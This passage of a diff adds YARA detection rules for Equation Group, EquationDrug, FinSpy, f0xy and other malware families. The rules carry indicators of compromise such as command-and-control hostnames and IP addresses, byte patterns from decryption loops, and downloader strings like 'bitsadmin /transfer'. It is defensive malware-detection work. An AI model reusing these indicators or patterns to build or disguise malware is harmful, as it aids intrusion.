+		$s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
+		$s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
+		$s5 = "Chrome" fullword wide
+		$s6 = "StringIndex" fullword ascii
+
+		$x1 = "itemagic.net@443" fullword wide
+		$x2 = "team4heat.net@443" fullword wide
+		$x5 = "62.216.152.69@443" fullword wide
+		$x6 = "84.233.205.37@443" fullword wide
+
+		$z1 = "www.microsoft.com@80" fullword wide
+		$z2 = "www.google.com@80" fullword wide
+		$z3 = "127.0.0.1:3128" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 300000 and
+		(
+			( all of ($s*) and all of ($z*) ) or
+			( all of ($s*) and 1 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_DoubleFantasy_1 {
+	meta:
+		description = "Equation Group Malware - DoubleFantasy"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
+	strings:
+		$mz = { 4d 5a }
+
+		$z1 = "msvcp5%d.dll" fullword ascii
+
+		$s0 = "actxprxy.GetProxyDllInfo" fullword ascii
+		$s3 = "actxprxy.DllGetClassObject" fullword ascii
+		$s5 = "actxprxy.DllRegisterServer" fullword ascii
+		$s6 = "actxprxy.DllUnregisterServer" fullword ascii
+
+		$x1 = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" ascii
+		$x2 = "191H1a1" fullword ascii
+		$x3 = "November " fullword ascii
+		$x4 = "abababababab" fullword ascii
+		$x5 = "January " fullword ascii
+		$x6 = "October " fullword ascii
+		$x7 = "September " fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 350000 and
+		(
+			( $z1 ) or
+			( all of ($s*) and 6 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_GROK_Keylogger {
+	meta:
+		description = "Equation Group Malware - GROK keylogger"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "c:\\users\\rmgree5\\" ascii
+		$s1 = "msrtdv.sys" fullword wide
+
+		$x1 = "svrg.pdb" fullword ascii
+		$x2 = "W32pServiceTable" fullword ascii
+		$x3 = "In forma" fullword ascii
+		$x4 = "ReleaseF" fullword ascii
+		$x5 = "criptor" fullword ascii
+		$x6 = "astMutex" fullword ascii
+		$x7 = "ARASATAU" fullword ascii
+		$x8 = "R0omp4ar" fullword ascii
+
+		$z1 = "H.text" fullword ascii
+		$z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
+	condition:
+		( $mz at 0 ) and filesize < 250000 and
+		(
+			$s0 or
+			( $s1 and 6 of ($x*) ) or
+			( 6 of ($x*) and all of ($z*) )
+		)
+}
+
+rule Equation_Kaspersky_GreyFishInstaller {
+	meta:
+		description = "Equation Group Malware - Grey Fish"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
+	strings:
+		$s0 = "DOGROUND.exe" fullword wide
+		$s1 = "Windows Configuration Services" fullword wide
+		$s2 = "GetMappedFilenameW" fullword ascii
+	condition:
+		all of them
+}
+
+rule Equation_Kaspersky_EquationDrugInstaller {
+	meta:
+		description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
+	strings:
+		$mz = { 4d 5a }
+
+		$s0 = "\\system32\\win32k.sys" fullword wide
+		$s1 = "ALL_FIREWALLS" fullword ascii
+
+		$x1 = "@prkMtx" fullword wide
+		$x2 = "STATIC" fullword wide
+		$x3 = "windir" fullword wide
+		$x4 = "cnFormVoidFBC" fullword wide
+		$x5 = "CcnFormSyncExFBC" fullword wide
+		$x6 = "WinStaObj" fullword wide
+		$x7 = "BINRES" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 500000 and all of ($s*) and 5 of ($x*)
+}
+
+rule Equation_Kaspersky_EquationLaserInstaller {
+	meta:
+		description = "Equation Group Malware - EquationLaser Installer"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "Failed to get Windows version" fullword ascii
+		$s1 = "lsasrv32.dll and lsass.exe" fullword wide
+		$s2 = "\\\\%s\\mailslot\\%s" fullword ascii
+		$s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
+		$s4 = "lsasrv32.dll" fullword ascii
+		$s5 = "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" fullword ascii
+		$s6 = "%s %02x %s" fullword ascii
+		$s7 = "VIEWERS" fullword ascii
+		$s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 250000 and 6 of ($s*)
+}
+
+rule Equation_Kaspersky_FannyWorm {
+	meta:
+		description = "Equation Group Malware - Fanny Worm"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
+	strings:
+		$mz = { 4d 5a }
+
+		$s1 = "x:\\fanny.bmp" fullword ascii
+		$s2 = "32.exe" fullword ascii
+		$s3 = "d:\\fanny.bmp" fullword ascii
+
+		$x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
+		$x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
+		$x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
+		$x4 = "\\system32\\win32k.sys" fullword wide
+		$x5 = "\\AGENTCPD.DLL" fullword ascii
+		$x6 = "agentcpd.dll" fullword ascii
+		$x7 = "PADupdate.exe" fullword ascii
+		$x8 = "dll_installer.dll" fullword ascii
+		$x9 = "\\restore\\" fullword ascii
+		$x10 = "Q:\\__?__.lnk" fullword ascii
+		$x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
+		$x12 = "\\shelldoc.dll" fullword ascii
+		$x13 = "file size = %d bytes" fullword ascii
+		$x14 = "\\MSAgent" fullword ascii
+		$x15 = "Global\\RPCMutex" fullword ascii
+		$x16 = "Global\\DirectMarketing" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 300000 and
+		(
+			( 2 of ($s*) ) or
+			( 1 of ($s*) and 6 of ($x*) ) or
+			( 14 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_HDD_reprogramming_module {
+	meta:
+		description = "Equation Group Malware - HDD reprogramming module"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "nls_933w.dll" fullword ascii
+
+		$s1 = "BINARY" fullword wide
+		$s2 = "KfAcquireSpinLock" fullword ascii
+		$s3 = "HAL.dll" fullword ascii
+		$s4 = "READ_REGISTER_UCHAR" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 300000 and all of ($s*)
+}
+
+rule Equation_Kaspersky_EOP_Package {
+	meta:
+		description = "Equation Group Malware - EoP package and malware launcher"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "abababababab" fullword ascii
+		$s1 = "abcdefghijklmnopq" fullword ascii
+		$s2 = "@STATIC" fullword wide
+		$s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
+		$s4 = "@prkMtx" fullword wide
+		$s5 = "prkMtx" fullword wide
+		$s6 = "cnFormVoidFBC" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 100000 and all of ($s*)
+}
+
+rule Equation_Kaspersky_TripleFantasy_Loader {
+	meta:
+		description = "Equation Group Malware - TripleFantasy Loader"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
+	strings:
+		$mz = { 4d 5a }
+
+		$x1 = "Original Innovations, LLC" fullword wide
+		$x2 = "Moniter Resource Protocol" fullword wide
+		$x3 = "ahlhcib.dll" fullword wide
+
+		$s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
+		$s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
+		$s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
+		$s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
+		$s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
+		$s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 50000 and ( all of ($x*) and all of ($s*) )
+}
+
+/* Rule generated from the mentioned keywords */
+
+rule Equation_Kaspersky_SuspiciousString {
+	meta:
+		description = "Equation Group Malware - suspicious string found in sample"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/17"
+		score = 60
+	strings:
+		$mz = { 4d 5a }
+
+		$s1 = "i386\\DesertWinterDriver.pdb" fullword
+		$s2 = "Performing UR-specific post-install..."
+		$s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
+		$s4 = "STRAITSHOOTER30.exe"
+		$s5 = "standalonegrok_2.1.1.1"
+		$s6 = "c:\\users\\rmgree5\\"
+	condition:
+		( $mz at 0 ) and filesize < 500000 and all of ($s*)
+}
+
+/* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */
+
+rule EquationDrug_NetworkSniffer1 {
+	meta:
+		description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s3 = "sys\\mstcp32.dbg" fullword ascii
+		$s7 = "mstcp32.sys" fullword wide
+		$s8 = "p32.sys" fullword ascii
+		$s9 = "\\Device\\%ws_%ws" fullword wide
+		$s10 = "\\DosDevices\\%ws" fullword wide
+		$s11 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_CompatLayer_UnilayDLL {
+	meta:
+		description = "EquationDrug - Unilay.DLL"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "unilay.dll" fullword ascii
+	condition:
+		( $mz at 0 ) and $s0
+}
+
+rule EquationDrug_HDDSSD_Op {
+	meta:
+		description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+	strings:
+		$s0 = "nls_933w.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer2 {
+	meta:
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "sys\\tdip.dbg" fullword ascii
+		$s4 = "dip.sys" fullword ascii
+		$s5 = "\\Device\\%ws_%ws" fullword wide
+		$s6 = "\\DosDevices\\%ws" fullword wide
+		$s7 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer3 {
+	meta:
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "14599516381a9646cd978cf962c4f92386371040"
+	strings:
+		$s0 = "Corporation. All rights reserved." fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "tdip.pdb" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_VolRec_Driver {
+	meta:
+		description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
+	strings:
+		$s0 = "msrstd.sys" fullword wide
+		$s1 = "msrstd.pdb" fullword ascii
+		$s2 = "msrstd driver" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_KernelRootkit {
+	meta:
+		description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "Parmsndsrv.dbg" fullword ascii
+		$s2 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s3 = "msndsrv.sys" fullword wide
+		$s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" fullword wide
+		$s6 = "\\Device\\%ws_%ws" fullword wide
+		$s7 = "\\DosDevices\\%ws" fullword wide
+		$s9 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_Keylogger {
+	meta:
+		description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
+	strings:
+		$s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
+		$s3 = "\\DosDevices\\Gk" fullword wide
+		$s5 = "\\Device\\Gk0" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer4 {
+	meta:
+		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "cace40965f8600a24a2457f7792efba3bd84d9ba"
+	strings:
+		$s0 = "Copyright 1999 RAVISENT Technologies Inc." fullword wide
+		$s1 = "\\systemroot\\" fullword ascii
+		$s2 = "RAVISENT Technologies Inc." fullword wide
+		$s3 = "Created by VIONA Development" fullword wide
+		$s4 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s5 = "\\device\\harddiskvolume" fullword wide
+		$s7 = "ATMDKDRV.SYS" fullword wide
+		$s8 = "\\Device\\%ws_%ws" fullword wide
+		$s9 = "\\DosDevices\\%ws" fullword wide
+		$s10 = "CineMaster C 1.1 WDM Main Driver" fullword wide
+		$s11 = "\\Device\\%ws" fullword wide
+		$s13 = "CineMaster C 1.1 WDM" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_PlatformOrchestrator {
+	meta:
+		description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
+	strings:
+		$s0 = "SERVICES.EXE" fullword wide
+		$s1 = "\\command.com" fullword wide
+		$s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s3 = "LSASS.EXE" fullword wide
+		$s4 = "Windows Configuration Services" fullword wide
+		$s8 = "unilay.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer5 {
+	meta:
+		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s2 = "atmdkdrv.sys" fullword wide
+		$s4 = "\\Device\\%ws_%ws" fullword wide
+		$s5 = "\\DosDevices\\%ws" fullword wide
+		$s6 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_FileSystem_Filter {
+	meta:
+		description = "EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
+	strings:
+		$s0 = "volrec.sys" fullword wide
+		$s1 = "volrec.pdb" fullword ascii
+		$s2 = "Volume recognizer driver" fullword wide
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Ezcob.yara remnux-rules-0.0.4/yara.old/Ezcob.yara
--- remnux-rules-0.0.3/yara.old/Ezcob.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Ezcob.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule EzcobStrings : Ezcob Family
+{
+    meta:
+        description = "Ezcob Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12"
+        $ = "\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12"
+        $ = "Ezcob" wide ascii
+        $ = "l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126"
+        $ = "20110113144935"
+        
+    condition:
+       any of them
+}
+
+rule Ezcob : Family
+{
+    meta:
+        description = "Ezcob"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        EzcobStrings
+}
diff -Nru remnux-rules-0.0.3/yara.old/F0xy.yara remnux-rules-0.0.4/yara.old/F0xy.yara
--- remnux-rules-0.0.3/yara.old/F0xy.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/F0xy.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ws_f0xy_downloader {
+  meta:
+    description = "f0xy malware downloader"
+    author = "Nick Griffin (Websense)"
+
+  strings:
+    $mz="MZ"
+    $string1="bitsadmin /transfer"
+    $string2="del rm.bat"
+    $string3="av_list="
+  
+  condition:
+    ($mz at 0) and (all of ($string*))
+}
diff -Nru remnux-rules-0.0.3/yara.old/FakeM.yara remnux-rules-0.0.4/yara.old/FakeM.yara
--- remnux-rules-0.0.3/yara.old/FakeM.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/FakeM.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule HTMLVariant : FakeM Family HTML Variant
+{
+	meta:
+		description = "Identifier for html variant of FAKEM"
+		author = "Katie Kleemola"
+		last_updated = "2014-05-20"
+	
+	strings:
+		// decryption loop
+		$s1 = { 8B 55 08 B9 00 50 00 00 8D 3D ?? ?? ?? 00 8B F7 AD 33 C2 AB 83 E9 04 85 C9 75 F5 }
+		//mov byte ptr [ebp - x] y, x: 0x10-0x1 y: 0-9,A-F
+		$s2 = { C6 45 F? (3?|4?) }
+
+	condition:
+		$s1 and #s2 == 16
+
+}
diff -Nru remnux-rules-0.0.3/yara.old/favorite.yara remnux-rules-0.0.4/yara.old/favorite.yara
--- remnux-rules-0.0.3/yara.old/favorite.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/favorite.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,38 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FavoriteCode : Favorite Family 
+{
+    meta:
+        description = "Favorite code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+    
+    strings:
+        // standard string hiding
+        $ = { C6 45 ?? 3B C6 45 ?? 27 C6 45 ?? 34 C6 45 ?? 75 C6 45 ?? 6B C6 45 ?? 6C C6 45 ?? 3B C6 45 ?? 2F }
+        $ = { C6 45 ?? 6F C6 45 ?? 73 C6 45 ?? 73 C6 45 ?? 76 C6 45 ?? 63 C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 }
+    
+    condition:
+        any of them
+}
+
+rule FavoriteStrings : Favorite Family
+{
+    meta:
+        description = "Favorite Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    strings:
+        $string1 = "!QAZ4rfv"
+        $file1 = "msupdater.exe"
+        $file2 = "FAVORITES.DAT"
+        
+    condition:
+       any of ($string*) or all of ($file*)
+}
diff -Nru remnux-rules-0.0.3/yara.old/FinSpy.yara remnux-rules-0.0.4/yara.old/FinSpy.yara
--- remnux-rules-0.0.3/yara.old/FinSpy.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/FinSpy.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,138 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FinSpy_2
+{
+    meta:
+        description = "FinFisher FinSpy"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $password1 = /\/scomma kbd101\.sys/ wide ascii
+        $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
+        $password3 = /\/scomma excel2010\.part/ wide ascii
+        $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
+        $password5 = /\/stab MSVCR32\.manifest/ wide ascii
+        $password6 = /\/scomma MSN2010\.dll/ wide ascii
+        $password7 = /\/scomma Firefox\.base/ wide ascii
+        $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
+        $password9 = /\/scomma IE7setup\.sys/ wide ascii
+        $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
+        $password11 = /\/scomma office2007\.cab/ wide ascii
+        $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
+        $password13 = /\/scomma outlook2007\.dll/ wide ascii
+        $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
+
+        $screenrec1 = /(s)111o00000000\.dat/ wide ascii
+        $screenrec2 = /(t)111o00000000\.dat/ wide ascii
+        $screenrec3 = /(f)113o00000000\.dat/ wide ascii
+        $screenrec4 = /(w)114o00000000\.dat/ wide ascii
+        $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
+        $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
+        $screenrec7 = /(v)112O00000000\.dat/ wide ascii
+
+        //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
+        //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
+
+        $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
+
+        $skyperec1 = /\[%19s\] %25s\:    %s/ wide ascii
+        $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
+        $skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
+
+        $mouserec1 = /(m)sc183Q000\.dat/ wide ascii
+        $mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
+
+        $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
+
+        $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
+        $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
+
+        $versions1 = /(f)inspyv2/ nocase
+        $versions2 = /(f)inspyv4/ nocase
+
+        $bootkit1 = /(b)ootkit_x32driver/
+        $bootkit2 = /(b)ootkit_x64driver/
+
+        $typo1 = /(S)creenShort Recording/ wide
+
+        $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
+
+    condition:
+        8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or any of ($mouserec*) or $driver or any of ($janedow*) or any of ($versions*) or any of ($bootkit*) or $typo1 or $mssounddx
+}
+
+rule FinSpy
+{
+    meta:
+        description = "FinFisher FinSpy"
+        author = "AlienVault Labs"
+
+    strings:
+        $filter1 = "$password14"
+        $filter2 = "$screenrec7"
+        $filter3 = "$micrec"
+        $filter4 = "$skyperec3"
+        $filter5 = "$mouserec2"
+        $filter6 = "$driver"
+        $filter7 = "$janedow2"
+        $filter8 = "$bootkit2"
+
+        $password1 = /\/scomma kbd101\.sys/ wide ascii
+        $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
+        $password3 = /\/scomma excel2010\.part/ wide ascii
+        $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
+        $password5 = /\/stab MSVCR32\.manifest/ wide ascii
+        $password6 = /\/scomma MSN2010\.dll/ wide ascii
+        $password7 = /\/scomma Firefox\.base/ wide ascii
+        $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
+        $password9 = /\/scomma IE7setup\.sys/ wide ascii
+        $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
+        $password11 = /\/scomma office2007\.cab/ wide ascii
+        $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
+        $password13 = /\/scomma outlook2007\.dll/ wide ascii
+        $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
+
+        $screenrec1 = /(s)111o00000000\.dat/ wide ascii
+        $screenrec2 = /(t)111o00000000\.dat/ wide ascii
+        $screenrec3 = /(f)113o00000000\.dat/ wide ascii
+        $screenrec4 = /(w)114o00000000\.dat/ wide ascii
+        $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
+        $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
+        $screenrec7 = /(v)112O00000000\.dat/ wide ascii
+
+        //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
+        //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
+
+        $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
+
+        $skyperec1 = /\[%19s\] %25s\:    %s/ wide ascii
+        $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
+        //$skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
+
+        //$mouserec1 = /(m)sc183Q000\.dat/ wide ascii
+        //$mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
+
+        $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
+
